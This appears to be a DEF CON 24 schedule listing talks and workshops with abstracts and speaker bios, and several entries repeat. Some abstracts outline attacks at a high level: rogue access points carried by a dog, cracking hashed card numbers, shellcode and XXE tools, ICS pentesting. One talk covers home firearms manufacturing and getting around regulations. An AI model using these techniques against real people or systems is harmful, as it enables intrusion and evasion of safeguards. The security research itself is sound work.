One of the main reasons for this verisimilitude is the work of Kor Adana, MR. ROBOT's advisor on all things hackish. His fingerprints are on every terminal window in the show. Another advisor to the show is our very own CJunky - known to the outside world as hacker and raconteur Marc Rogers. Join Dark Tangent for a panel discussion of MR. ROBOT: the phenomenon, the hacks and the crazy ways the show seems to pull its storylines from the future. Bring your questions, and keep an eye out for late-breaking special guests.
Kor Adana’s interest in technology started as a child when he tried to build a red box to get free calls on pay phones. By the time he was in middle school, he was building his own computer systems and getting into trouble. After obtaining a B.S. in IT Network Administration, Kor went on to work in enterprise network security for one of the world’s largest automakers. He performed penetration testing, designed security policies, managed enterprise-wide eDiscovery, and conducted forensics for legal and HR matters. While there, he also worked alongside NASA in a high-profile government investigation. He eventually left the IT world to pursue his true passion, writing for film and television. He’s worked with the producers of THE WALKING DEAD, THE SHIELD, LOST, and DEXTER. He is currently a writer and technical supervisor for USA's Golden Globe Award-winning drama, MR. ROBOT. He also has one of his own projects in development with Universal Cable Productions.
Ryan Kazanciyan is the Chief Security Architect for Tanium and has thirteen years of experience in incident response and forensics, penetration testing, and security architecture. Prior to joining Tanium, Ryan was a technical director and lead investigator at Mandiant, where he worked with dozens of Fortune 500 organizations impacted by targeted attacks.
Ryan has presented security research at dozens of events worldwide, including Black Hat, DEFCON, and RSA. He has led training sessions for hundreds of the FBI's cyber squad agents, and was a contributing author for "Incident Response and Computer Forensics, 3rd Edition", published in 2014.
Andre McGregor is at DEFCON 24 celebrating his one-year anniversary as Tanium’s Director of Security responsible for internal cybersecurity. Prior to joining Tanium, Andre was a fresh-faced new agent with the FBI working cases like the NYC Subway bomber and Times Square car bomb while arresting his share of Italian Organized Crime bosses. His computer engineering background led him to help form FBI New York’s first cyber national security squad focused on computer intrusions from China, Russia, and Iran. Having deploying with NSA Blue Team and DHS US-CERT/ICS-CERT as a technically-trained cyber agent, Andre has led numerous large-scale cyber investigations ranging from financial crimes to critical infrastructure protection. In his free time, when he wasn’t sifting through terabytes of Netflow with SiLK and playing around with Autopsy and IDA, Andre was an FBI firearms instructor, dive team medic, and a volunteer firefighter driving fire trucks. After graduating from Brown University, Andre worked as an engineer at Goldman Sachs and later transitioned to IT Director at Cardinal Health/Advogent. Having shed the badge and gun last year, Andre currently serves as the FBI cyber technical consultant for the TV show Mr. Robot.
Kim Zetter is an award-winning, senior staff reporter at Wired covering cybercrime, privacy, and security. She is writing a book about Stuxnet, a digital weapon that was designed to sabotage Iran's nuclear program.
Dark Tangent & Marc Rogers Bios to come
Return to Index
Wireless - Skyview 1 - Saturday - 16:00-16:30
Tom Hayes
Bio
Lifelong student, researcher, and public infrastructure enthusiast.
@tomx4096
Abstract
"Wireless standards that divide their frequency band into channels pose a
fundamental challenge to wardrivers: what frequency is the target on? The
traditional approach is to scan the spectrum, either actively or passively, to
try to discover unknown wireless networks while passing them. Single-frequency
scans carry the risk of not finding networks or being foiled by frequency
hopping strategies. The wardriving of tomorrow should mitigate these risks with
""full-take"" spectrum captures that eavesdrop on every channel simultaneously.
IEEE 802.15.4 is a simple wireless protocol that has 16 channels in the
unlicensed 2.4 GHz band, and is gaining traction in the IoT world. Many hacking tools like KillerBee and Api-Mote have been developed for it, which rely on scanning to find new networks. Recent approaches to multi-channel 802.15.4 sniffing use either software defined radio or a cluster of existing sniffers. These approaches can be expensive, clunky, and sometimes do not cover every channel. We promote a third, hardware based approach based on multiple radio transceivers embedded into a single device. This talk features a short analysis of IEEE 802.15.4 sniffing technologies and presents a new design for a multi-channel sniffer. "
|
Return to Index
BHV - Skyview 4 - Friday - 11:30-11:59
Speaker: Rafael Fontes Souza
About Rafael:
Rafael Fontes Souza aka b4ckd00r is a Senior Information Security Consultant at CIPHER. He is a core member of Cipher Intelligence Labs - the advanced security team focused on penetration testing, application security and computer forensics for premier clients. He started studying at age 13 and since then has disclosed security vulnerabilities and has received recognition and awards from major companies such as Apple, Microsoft, ESET, HP and others. Being done hundreds of successful penetration tests for various organizations, including government, banking, commercial sectors, as well the payment card industry.
Abstract:
This presentation is about a creative approach to intrusion tests, as the popular saying would say: "–The dog is man's best friend" (he makes you feel good and secure). Let's explore the vulnerability of layer eight, the human being, subject to error and the social engineering techniques; This is an innovative method, with art and style, will be simpler than it sounds; The dog will be used as an attack tool, which will carry a mobile phone hidden along with its pectoral collar.
The attack vectors are triggered automatically without any human interaction. This may include geographically close attacks, such as fake Wi-Fi access points, cellular base stations or local user attacks on a network, we can exploit DNS hijacking, packet injection, Evil-Twin, rogue router or ISP, and many other variants.
Furthermore, the target will connect to your rogue wifi access point and the rules are enabled with the DHCP configurations to allow fake AP to allocate IP address to the clients and forward traffic to a fake/malicious web-site; Then, the information can be stored easily as well the injection of malicious file to remotely control the victim.
And it's done. You can drop your hacker dog in a park and expect him to hack people for you, quietly, that's perfect!
Return to Index
BHV - Skyview 4 - Friday - 11:30-11:59
Speaker: Rafael Fontes Souza
About Rafael:
Rafael Fontes Souza aka b4ckd00r is a Senior Information Security Consultant at CIPHER. He is a core member of Cipher Intelligence Labs - the advanced security team focused on penetration testing, application security and computer forensics for premier clients. He started studying at age 13 and since then has disclosed security vulnerabilities and has received recognition and awards from major companies such as Apple, Microsoft, ESET, HP and others. Being done hundreds of successful penetration tests for various organizations, including government, banking, commercial sectors, as well the payment card industry.
Abstract:
This presentation is about a creative approach to intrusion tests, as the popular saying would say: "–The dog is man's best friend" (he makes you feel good and secure). Let's explore the vulnerability of layer eight, the human being, subject to error and the social engineering techniques; This is an innovative method, with art and style, will be simpler than it sounds; The dog will be used as an attack tool, which will carry a mobile phone hidden along with its pectoral collar.
The attack vectors are triggered automatically without any human interaction. This may include geographically close attacks, such as fake Wi-Fi access points, cellular base stations or local user attacks on a network, we can exploit DNS hijacking, packet injection, Evil-Twin, rogue router or ISP, and many other variants.
Furthermore, the target will connect to your rogue wifi access point and the rules are enabled with the DHCP configurations to allow fake AP to allocate IP address to the clients and forward traffic to a fake/malicious web-site; Then, the information can be stored easily as well the injection of malicious file to remotely control the victim.
And it's done. You can drop your hacker dog in a park and expect him to hack people for you, quietly, that's perfect!
Return to Index
BHV - Skyview 4 - Sunday - 13:30-13:59
Speaker: Dr. Stanislav Naydin and Vlad Gostomelsky
About Dr. Dr. Stanislav Naydin:
Dr. Stanislav Naydin is in residency to for neurology with a background in pharmaceutical sciences. He is heavily focused on procedure based medicine. He has been involved in a multitude of advanced surgeries and interventions. Prior to transitioning to the medical field Stanislav was an industrial robotics designer and programmer in the glass industry.
About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks. He specializes in the intersection of physical and network security.
We will engage the audience in a discussion of modern technological advances along with their ethical implications. We live in an era where the very implanted hardware that keeps you alive can be evidence in the court of law. Neuroscience is now a tool used by marketing firms. Following this discussion on medical ethics we will continue with a show and tell of some recent cases where medical devices were used as evidence against the patients. We discuss some of the medical devices that have been tested by us in the past year and the vulnerabilities that were discovered.
Return to Index
BHV - Skyview 4 - Sunday - 13:30-13:59
Speaker: Dr. Stanislav Naydin and Vlad Gostomelsky
About Dr. Dr. Stanislav Naydin:
Dr. Stanislav Naydin is in residency to for neurology with a background in pharmaceutical sciences. He is heavily focused on procedure based medicine. He has been involved in a multitude of advanced surgeries and interventions. Prior to transitioning to the medical field Stanislav was an industrial robotics designer and programmer in the glass industry.
About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks. He specializes in the intersection of physical and network security.
We will engage the audience in a discussion of modern technological advances along with their ethical implications. We live in an era where the very implanted hardware that keeps you alive can be evidence in the court of law. Neuroscience is now a tool used by marketing firms. Following this discussion on medical ethics we will continue with a show and tell of some recent cases where medical devices were used as evidence against the patients. We discuss some of the medical devices that have been tested by us in the past year and the vulnerabilities that were discovered.
Return to Index
BHV - Skyview 4 - Friday - 16:30-16:59
Speakers: Gingerbread
About Gingerbread:
Long-time Security malcontent Gingerbread, having been eliminated early on in this years "Pop-and-Lock Potluck", (the nations *premier* overweight break dancing competition) has returned to DEF CON with even more of his half-baked theories, bro-science, and questionable supply chain advice for your enjoyment. Early adopter of the "Not for human consumption" defense, Gingerbread has spent years conducting extensive research in the areas of cognition enhancing drugs and lifestyle regimens and in the process has become a walking encyclopedia of things NOT to do.
Abstract:
Everything is impossible until it isn't.
Every undertaking, defined by the hard limitations at the edges of our possible achievement.
Lossless electrical conductivity, human travel beyond the sound 'barrier', running a four-minute mile...each, seen as some unassailable foe until, one-by-one, these milestones were not just approached and then attained, but very often surpassed. With time, these limits transition from the superlative, to the standard, and what once was thought of as impossible, now becomes the benchmark of superior performance.
The world of cognition enhancing drugs is no different.
For nearly as long as such structures have been differentiated, the cells of the brain and nervous system have been acknowledged to behave very differently than most of the others in the body.
Unlike the perpetual turn over that the rest of the body enjoys, there are only a few restricted areas in the brain and CNS of adult humans where new nerve cells are being regularly created. What you are born with, is what you have to work with.
Or is it?
Reliably producing productive structural, as opposed to solely chemical changes to the brain has long been seen as the 'Holy Grail' of Nootropics research..I am here today to discuss why the term "Four-minute mile" may be a bit more appropriate.
From the explosions of growth created in early childhood and in some illnesses, to the seemingly paradoxical benefits seen with the removal of malfunctioning structures, we are going to examine the sometimes baffling relationship between cognition and the physical structure of the brain, and how maybe, just maybe, there might be something you can do about it.
Return to Index
BHV - Skyview 4 - Friday - 16:30-16:59
Speakers: Gingerbread
About Gingerbread:
Long-time Security malcontent Gingerbread, having been eliminated early on in this years "Pop-and-Lock Potluck", (the nations *premier* overweight break dancing competition) has returned to DEF CON with even more of his half-baked theories, bro-science, and questionable supply chain advice for your enjoyment. Early adopter of the "Not for human consumption" defense, Gingerbread has spent years conducting extensive research in the areas of cognition enhancing drugs and lifestyle regimens and in the process has become a walking encyclopedia of things NOT to do.
Abstract:
Everything is impossible until it isn't.
Every undertaking, defined by the hard limitations at the edges of our possible achievement.
Lossless electrical conductivity, human travel beyond the sound 'barrier', running a four-minute mile...each, seen as some unassailable foe until, one-by-one, these milestones were not just approached and then attained, but very often surpassed. With time, these limits transition from the superlative, to the standard, and what once was thought of as impossible, now becomes the benchmark of superior performance.
The world of cognition enhancing drugs is no different.
For nearly as long as such structures have been differentiated, the cells of the brain and nervous system have been acknowledged to behave very differently than most of the others in the body.
Unlike the perpetual turn over that the rest of the body enjoys, there are only a few restricted areas in the brain and CNS of adult humans where new nerve cells are being regularly created. What you are born with, is what you have to work with.
Or is it?
Reliably producing productive structural, as opposed to solely chemical changes to the brain has long been seen as the 'Holy Grail' of Nootropics research..I am here today to discuss why the term "Four-minute mile" may be a bit more appropriate.
From the explosions of growth created in early childhood and in some illnesses, to the seemingly paradoxical benefits seen with the removal of malfunctioning structures, we are going to examine the sometimes baffling relationship between cognition and the physical structure of the brain, and how maybe, just maybe, there might be something you can do about it.
Return to Index
DEFCON - DEF CON 101 - Saturday - 13:00-13:59
NG9-1-1: The Next Generation of Emergency Ph0nage
CINCVolFLT (Trey Forgety) Director of Government Affairs & IT Ninja, NENA: The 9-1-1 Association
AK3R303 (Alex Kreilein) CTO & Co-Founder, SecureSet
For 48 years, 9-1-1 has been /the/ emergency telephone number in the United States. It's also been mired in 48-year-old technology. So let's just put that on the internet, right? What could possibly go wrong? Without the radical segmentation of the PSTN, the move to IP networks (even the private, managed kind) will bring new 9-1-1 capabilities AND new vulnerabilities. This talk builds on the work of quaddi, r3plicant, and Peter Hefley (see &lquo;Hacking 911: Adventures in Destruction, Disruption, and Death,&rquo; DEF CON 22, http://ow.ly/10AvZh). It provides an overview of NG9-1-1 architecture and security concerns, and identifies critical attack surfaces that Public Safety Answering Points need to monitor and secure. Familiarity with NENA's i3 and NG-SEC standards may be helpful, but is not required.
CINCVolFLT (Trey Forgety) is Director of Government Affairs for NENA: The 9-1-1 Association. He previously served as a Presidential Management Fellow in the U.S. Department of Homeland Security's Office of Emergency Communications, with rotations in the Federal Communications Commission's Public Safety and Homeland Security Bureau, and the U.S. Department of Commerce's National Telecommunications and Information Administration. A sometimes-piratical sailor and inveterate tinkerer, CINCVolFLT's recent activities have included work on establishing a backup timing source for telecom networks to ensure service during GPS outages or jammin, and serving as pro bono counsel to QueerCon.He holds a B.S. in Applied Physics and a J.D., both from the University of Tennessee (GO VOLS!).
Twitter: @cincvolflt
AK3R303 (Alex Kreilein) is Managing Partner and CTO of SecureSet, which is a cybersecurity services provider specializing in education and startup acceleration. Previously, AK3R303 was a Technology Strategist with the U.S. Department of Homeland Security and a Guest Researcher at the National Institute of Standards and Technology focusing on public safety and mobile communications network security. He holds a B.A. from Fordham University where he studied nuclear game theory through the political science department in Beijing, China. He holds an M.A. in National Security & Strategic Studies from the US Naval War College, and is an M.S. / Ph.D. candidate at the CU Boulder College of Engineering & Applied Sciences in Telecom Engineering.
Twitter: @ak3r303
Return to Index
Workshops - Las Vegas Ballroom 5 - Saturday - 10:00-14:00
Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation
Madhu Akula Automation Security Ninja, Appsecco
Riyaz Walikar Chief Offensive Security Officer, Appsecco
For most network engineers who monitor the perimeter for malicious content, it is very important to respond to an imminent threat originating from outside the boundaries of their network. Having to crunch through all the logs that the various devices (firewalls, routers, security appliances etc.) spit out, correlating that data and in real time making the right choices can prove to be a nightmare. Even with the solutions already available in the market.
As I have experienced this myself, as part of the Internal DevOps and Incident Response Teams, in several cases, I would want to create a space for interested folks to design, build, customize and deploy their very own FOSS based centralized visual attack monitoring dashboard. This setup would be able to perform real time analysis using the trusted ELK stack and visually denote what popular attack hotspots exist on a network.
Madhu Akula is an Automation Security Ninja at Appsecco, a company that specializes in Web Application Security. His primary interests lie with application & cloud security, DevOps and Automation. He is a security and DevOps researcher with over 3+ years of experience in the industry. He has expertise in building scalable and secure infrastructure. Implemented security solutions and worked with different clients across Govt, E-Commerce and IT industries.
His research has been selected for ToorCon, DefCamp, SkydogCon, NoloCon, etc in the past. He has been a keynote speaker for National Cyber Security conference in Dayananda Sagar College conducted by CompTIA.
Madhu Akula is also an active member with Bugcrowd, Hackerone, Synack etc. He has found vulnerabilities in open source products/platforms such as WordPress, Ntop, Opendocman etc. and is also a contributing bug hunter with Code Vigilant (a project to Secure Open Source Software). His research has identified many vulnerabilities in over 200 organizations including US Department of Homeland Security, Google, Microsoft, Yahoo, Adobe, LinkedIn, Ebay, At&t, Blackberry, Cisco, Barracuda etc.
Riyaz Walikar is the Chief Offensive Security Officer at Appsecco, a company that specializes in Web Application Security. His primary interests lie with application security, penetration testing and security evangelism. He is a security evangelist, offensive security expert and researcher with over 9 years of experience in the Internet and web application security industry. He has many years of experience providing web application security assessments, has lead penetration testing engagements in many countries and performed numerous onsite reviews on infrastructure and system security.
He also leads the Bangalore chapters of OWASP and the null community, actively encouraging participation and mentoring new comers in the industry.
Riyaz is also a frequent speaker at security events and conferences around the world including BlackHat, nullcon, c0c0n, xorconf, OWASP AppsecUSA.
He also dabbles in vulnerability research and has found bugs with several popular online services of major companies including Facebook, Twitter, Google Cisco, Symantec, Mozilla, PayPal, and EBay.
Max Class Size: 55
Prerequisites for students: Comfortable with basic Linux commands
Materials or Equipment students will need to bring to participate: Students will need a laptop with admin privileges as well as have at least 20GB of free space for virtual machines (students will need Virtual Box installed)
Return to Index
Workshops - Las Vegas Ballroom 5 - Friday - 14:00-18:00
Nmap NSE development for offense and defense
Paulino Calderon Co-founder, Websec
Tom Sellers Security Researcher
This workshop will teach participants how to use the Nmap Scripting Engine (NSE) to extend the power and capabilities of Nmap. It will cover the basics of the Nmap usage, NSE, and the Lua programming language before diving into how to solve problems by writing custom scripts. By the end of the workshop you will have in depth knowledge of the Nmap Scripting engine and how to develop scripts for offensive and defensive tasks. Participants will be provided with a virtual machine that they can use during the training.
Paulino Calderon (@calderpwn) has been in Information Security for more than 10 years. He is the co-founder of Websec, a company offering information security consulting services based in Mexico and Canada. He loves learning new technologies, conducting big data experiments, and developing and destroying software.
In 2011 Paulino joined the Nmap team during the program Google Summer of Code to work on the project as a NSE developer. He focused on improving the web scanning capabilities of Nmap and has kept on contributing to the project since then. He has also published ‘Nmap 6:Network Exploration and Security Auditing Cookbook’ and ‘Mastering the Nmap Scripting Engine’ covering practical tasks with Nmap and NSE development. He loves attending information security conferences and has given talks and workshops in over 20 events in Canada, United States, Mexico, Colombia, Peru and Bolivia.
Tom Sellers (@TomSellers) is a Security Researcher in the Rapid7 Labs team. He has spent 20 years in IT, 10 of which InfoSec. He has been responsible for defensive Information Security for companies in the finance, service provider, and security software industries. He started contributing to Nmap in 2007 with his contributions primarily focusing on service and operating system detection. He has also contributed multiple modules to the Metasploit Project.
Max Class Size: 35
Prerequisites for students: Participants should be familiar with basic TCP/IP networking, general security concepts, and basic Nmap usage. Previous programming experience would be helpful but isn’t required.
Materials or Equipment students will need to bring to participate: Participants will need a computer with VMware Player, VMware Fusion, or VirtualBox. USB thumbdrives with the target virtual machine images will be available.
Return to Index
BHV - Skyview 4 - Sunday - 13:30-13:59
Speaker: GingerBread
@the_real_gbm
hac.kthepla.net
About GingerBread:
Gingerbread man is an Information Security cookie from the greater Denver area. Requiring little sleep, and seemingly immune to alcohol, he is consistently seen at hacker events across the country while never seeming to actually do any work. With no verifiable credentials or formal training, there is the strong possibility he is making all of this stuff up.
Abstract:
GingerBread will present one mans take on the current state of nootropics and other cognition-enhancing drugs. Beginning with the neuro-enhancing drugs of the ancient Ayurveda and Traditional Chinese Medicine, working our way through the developments of the 1990s and 2000s, and finishing with the chaotic internet connected and unregulated world of today.
From Gingko Biloba to Pig Brain Concentrates, from cutting-edge science in million-dollar state of the art labs, to the crowd sourcing of syntheses for never-before-tested-in-man substances to be manufactured by the lowest bidder and distributed to the public wholesale.
I will present a few case study examples of both objective successes, and undeniable failures with self-experimentation. GingerBread will try and explain (to the best of my ability) a bit of what we know about the action of these drugs, why we think we know it, as well as ongoing developments in the fight to preserve cognition in the elderly and infirmed and to push the abilities of healthy individuals past their biological limitations.
Return to Index
WOS - Skyview 6 - Saturday - 13:10-13:59
Now You See Me, Now You Don't
Joseph Muniz, Architect and Researcher at Cisco
Aamir Lakahni, Senior Security Researcher at Fortinet
Many people leave behind bread crumbs of their personal life on social media, within systems they access daily, and on other digital sources. Your computer, your smartphone, your pictures and credit reports all create a information rich profile about you. This talk will discuss all the different threats that leak your information and how attackers can use open source intelligence to find you. We will discuss techniques used by law enforcement and private investigators to track individuals. Learn how you can protect your online footprint, reduce your digital trail, and securing your privacy.
Joseph Muniz (Twitter: @SecureBlogger) is a architect at Cisco Systems and researcher. He has extensive experience in designing security solutions for the top Fortune 500 corporations and US Government. Joseph's current role gives him visibility into the latest trends in cyber security both from leading vendors and customers. Joseph runs The Security Blogger website, a popular resource for security and product implementation. He is the author and contributor of several publications including a recent Cisco Press book focused on security operations centers (SOC).
Aamir Lakhani (Twitter: @aamirlakhani)
Return to Index
DEFCON - DEF CON 101 - Friday - 15:00-15:59
Eavesdropping on the Machines
Tim ‘t0rch’ Estell Solution Architect, BAE Systems
Katea Murray Cyber Researcher, Leidos
After the Rise of the Machines they'll need to communicate. And we'll need to listen in. The problem is that proprietary protocols are hard to break. If Wireshark barfs then we're done. Or can we listen in, break their Robot Overlord messages and spill it all to the meat-space rebels? Attend this talk to learn techniques for taking network data, identifying unknown protocols, and breaking them down to something you can exploit. Rebels unite!
Tim Estell, a hacker since learning how to mod a TRS-80 game in the ‘80s. Since then he’s reversed protocols, leveraged hardware, and managed teams for many concepts of operation. He remains convinced machines will never exceed meat space innovation and so welcomes our new Robot Overlords, if only because their cause is lost. Rebels unite!
Katea Murray, a programmer who turned to hacking in the early 00’s, she’s reversed and co-opted many tools and toys consumer’s touch, from old-school boat anchors to the latest mobile devices. Along the way she’s pulled recruits to the rebel cause through internships, outreach, and high energy. When she’s not watching sports she’s hacking as a sport. Game on!
Return to Index
CPV - Bronze 2 - Saturday - 10:30-11:00
Talk Title:
Oops, I Cracked My PANs
Speaker Name, Employer or position:
qu0rum
Abstract:
PCI DSS allows hashing as a technique for tokenizing or protecting stored cardholder data, calling hashes irreversible. Interestingly PCI does not require using salts or other advanced hashing techniques to strengthen these hashes. Using oclHashcat with a custom patch of our own, a list of valid IINs, and a GPU cracking rig we will show how to reverse the supposedly irreversible one-way hashes of payment card numbers, ultimately demonstrating that we can completely crack a PCI Compliant database of hashed PANs in a few hours.
Bio:
qu0rum started life as a developer during the dot com boom and quickly realized that writing secure code is a lot harder than breaking other peoples code so he hooked up with a security consulting company and got into penetration testing back before that was a popular thing to do. 15 years later he has handed off the day-to-day pen testing responsibilities to a new generation of testers and spends most of his time working with clients executives, convincing them that they should have someone test their security and figuring out what their testing programs should look like, but hes still breaking stuff and writing about it in a desperate attempt to save the world from its own horrible code.
As his straight-laced corporate alter-ego, qu0rum has presented at a number of information security conferences including Black Hat Briefings USA, RSA Conference, Infosec World, the ISSA Conference, Computerworld Expo, and at United States Secret Service Electronic Crimes Task Force meetings. His commentary has been featured in television and print information security news, including CBS Evening News, NBC News, CNN Money, USA Today, CSO Magazine, Secure Computing Magazine, Network Computing Magazine, and CRN.
Social media links if provided:
@qu0rum
Return to Index
Workshops - Las Vegas Ballroom 7 - Thursday - 15:00-19:00
Open Source Malware Lab
Robert Simmons Director of Research Innovation, ThreatConnect, Inc.
The landscape of open source malware analysis tools improves every day. A malware analysis lab can be thought of as a set of entry points into a tool chain. The main entry points are a file, a URL, a network traffic capture, and a memory image. This talk is an examination of the major open source tools that satisfy the analysis requirements for each of these entry points. Each tool’s output can potentially feed into another tool for further analysis. The linking of one tool to the next in a tool chain allows one to build a comprehensive automated malware analysis lab using open source software.
For file analysis, the three major versions of Cuckoo Sandbox will be examined. To analyze a potentially malicious URL, the low-interaction honeyclient, Thug, will be covered. Next, if one has a network capture (PCAP) to analyze, the Bro Network Security Monitor is a great option, and will be covered. Finally, if the analysis target is a memory image, the Volatility Framework will be examined. Each of the inputs and outputs of the tools will be reviewed to expose ways that they can be chained together for the purpose of automation. For each tool covered, the class will login to live instances of each and learn the basics of malware analysis using each one.
Robert Simmons is the Director of Research Innovation at ThreatConnect, Inc. With an expertise in building automated malware analysis systems based on open source tools, he has been tracking malware and phishing attacks and picking them apart for years. Robert is also the author of PlagueScanner, an open source virus scanner framework.
Robert, also known as Utkonos, has a background in biology, linguistics, and Russian area studies. He has lived extensively in Russia and Ukraine and has been known to swear profusely and constantly in Russian.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Bring a laptop with the current version of Chrome installed and a tested and working network connection (provide your own internet, please - only rely on the conference network if absolutely needed). Everything is remote and connected to via web browser - no malware will be worked on your equipment. Everything is remote.
Return to Index
Workshops - Las Vegas Ballroom 1 - Thursday - 10:00-14:00
Operation Dark Tangent: The DEF CON Messaging Protocol (DCMP)
Eijah Founder, demonsaw
The war with the Machines has been brutal. We've suffered so many casualties. And now we're weak, and the Machines know it. New D.C. is the last remaining human stronghold. Right now the Machines are preparing for one final assault that, if successful, will mean the end of all humanity. But it gets even worse. We've just received word that our leader, the Dark Tangent, has been captured. Without him we'll be unable to defend ourselves or mount a counter strike.
Your mission is to lead a group of brave hackers to rescue the Dark Tangent. But before you can do that you'll need to work together to devise a secure messaging protocol that the Machines won't be able to break. This secure protocol is vital so that the troops can communicate in secret during the operation without the Machines figuring out what we're doing. It's all up to you now. Do you have what it takes to defeat the Machines? Will you save us all?
This is a completely different kind of workshop. I'll present a very specific infiltration scenario with attack vectors that we can expect the Machines to use, e.g. session hijacking, message poisoning, replay and MITM attacks, etc. As a group we'll then work through our mission objectives and design a messaging protocol that will allow us to communicate securely. Finally, we'll implement the protocol in C++ and use it to communicate with each other in real-time. If everything works as expected we'll be able to defeat the Machines and rescue the Dark Tangent. If not… then all of humanity is lost.
Please note that this is an intermediate-level, technical workshop and requires that attendees have a strong working knowledge of C/C++. Bring your laptop, a USB flash drive, and your favorite C/C++ 11 compiler (>= gcc/g++ 4.7 or msvc 2013).
Eijah is the founder of demonsaw, a secure and anonymous information sharing program. For the last 5 years he was also a Senior Programmer at Rockstar Games where he worked on Grand Theft Auto V for PS3, Xbox 360, PS4, Xbox One, and PC. Eijah has over 15 years of software development and IT Security experience. His career has covered a broad range of Internet and mid-range technologies, core security, and system architecture. Eijah has been a faculty member at multiple colleges, has spoken about security and development at DEF CON and Hack Miami conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
Max Class Size: 55
Prerequisites for students: Previous experience in C/C++ is required along with at least a basic understanding of cryptographic fundamentals.
Materials or Equipment students will need to bring to participate: Laptop with Windows, Linux, or OSX. USB flash drive for saving their progress.
Return to Index
SkyTalks - Skyview 3 - Saturday - 16:00-16:59
Speaker: Gingerbread
Talk: Oops! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing
Long considered only the province of skilled craftsmen, firearm manufacturing has remained a arcane and esoteric skill even into the modern day. Generally requiring specialized tools and materials, this activity has always been out of the hands of the shade-tree experimenter except in the most crude and rudimentary examples.
Or has it?
Together we will explore various attempts to put the manufacturing of firearms within the reach of your average citizen, the associated motivations of the principle characters involved, and the legal ramifications and legal *clarifications* that have resulted from these efforts.
Through the work of early survivalist authors like Kurt Saxon and Ronald Brown, as well as more sophisticated offerings from the likes of Bill Holmes, Gerard Metral and P.A. Luty we can see an evolving movement of practical design and extensive experimentation in the domestic manufacturing of firearms. Various designs and levels of sophistication will be discussed.
Next We will look at more modern efforts focused on legal definitions and regulatory circumvention. It is in this space that 80% Lower receivers and flat-aks exist.
And finally we will look at the elephant in the room: The 3d printing of firearms. Far beyond the efforts of Cody Wilson and the highly publicized Liberator pistol, we will also look at previous attempts at high-tech clandestine weapons manufacturing using CNC routers and laser scanning, an evolving community of weapons designers and manufactures built around these construction methods, as well as important legal clarifications that have been brought on by this type of activity.
As will be all-too-clear at the end of the night, in order to get a gun We dont need no stinking background check
Return to Index
CPV - Bronze 2 - Saturday - 12:00-12:30
Talk Title:
Overview and evolution of password-based authentication schemes
Speaker Name, Employer or position:
Ignat Korchagin
Abstract:
Password is the oldest and the most widely used pillar of authentication, and is still being the core of approximately 80% of authentication events in the 21st century Internet. As the data on the Web becomes more valuable, more sophisticated attacks on authentication are being developed. The good thing is that crypto community tries to keep up with the continuously increasing threat surface and provides more advanced authentication techniques with higher security guarantees. However, password is still a solid building block in each of them: the first part of most two-factor authentication schemes is a password challenge, to generate one-time token, you enter a password, to use a hardware device - you enter a password in the device. But is verifying passwords secure? By communicating a password to a verifying party you leak at least some of the password information. Given the long history of password-based authentication schemes we can clearly see that it is rather challenging even to properly implement password verification. The presentation gives an overview of the evolution of password-based authentication schemes and provides comparison between two of the latest ones: socialist millionaires protocol and SPAKE2.
Bio:
Ignat is a security engineer at CloudFlare working mostly on platform and hardware security. Ignats interests are cryptography, hacking, and low-level programming. Before CloudFlare, Ignat worked as senior security engineer for Samsung Electronics Mobile Communications Division. His solutions may be found in many older Samsung smart phones and tablets. Ignat started his career as a security researcher in the Ukrainian governments communications services.
Social media links if provided:
@secumod
Return to Index
Demolabs - Table 5 - Saturday - 16:00-17:50
OWASP ZSC Shellcode
Johanna Curiel
Ali Ramzoo
OWASP ZSC is an open source software in python language which lets you generate customized shellcodes and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX under python.
Johanna Curiel is software developer with emphasis in secure coding. She is an active OWASP volunteer and has mainly worked in the area software development, testing and quality control. She understands different types of programming languages such as Java and PHP and different types of scripting languages.At the moment she works as an independent security engineer and researcher, living in the Dutch Caribbean.
Ali Ramzoo is the OWASP Iran Chapter leader and architect of OWASP ZSC tool . He recently graduated from the University of Sadra University - Tehran, and right now works as the Chief Technology Officer at Faranegar Knowledgeware Company (FaraSecurity) in Iran
Return to Index
Demolabs - Table 2 - Saturday - 16:00-17:50
OXML XXE
Willis Vandevanter
The tool assists the user in inserting XML based exploits (e.g. XXE) into different file types.The goal is to programmatically test for XML based attacks in web applications or software that allow for file imports.
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEF CON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.
Return to Index
Workshops - Las Vegas Ballroom 6 - Saturday - 14:00-18:00
PCB Design Crash Course: A primer to designing your own hacking tools
Seth Wahle Electronics Engineer & Hardware Hacker
Have you ever seen a system that knew you could hack, if you could only find a way to connect to its ridiculously exotic interface? What about that idea for an awesome hacking tool you imagined but didn't know how to build? If the massive learning curve to hardware design is holding back your plans to hack the world, then this is the workshop for you!
In this workshop, you will design your own basic LAN tap (based on the throwing star LAN tap from Great Scott Gadgets). We will go from the very basics all the way to a full set of design documentation that you could use to get your hardware design mass produced.
Seth Wahle is an electronics engineer and hardware hacker. He was featured in Forbes and BBC for hacking android phones using an implanted NFC chip in 2015. Seth has developed hardware that allows for 4k streaming video, produced a device that detects and eliminates enemy I.E.D.’s, and developed radio communications equipment for the next generation of fighter jets. Now as the lead engineer for Cyberdonix, Seth is developing next-gen I.O.T. based security appliances.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate:
Return to Index
Workshops - Las Vegas Ballroom 7 - Thursday - 10:00-14:00
Pentesting ICS 101
Arnaud Soullie Senior Consultant, Solucom
There is a lot of talking about ICS, SCADA and such nowadays, but only few people have the opportunity to get their hands dirty and understand how it works. The goal of this workshop is to give the knowledge required to start attacking Scada networks and PLCs, and give hands-on experience on real devices and have fun hacking a model train !
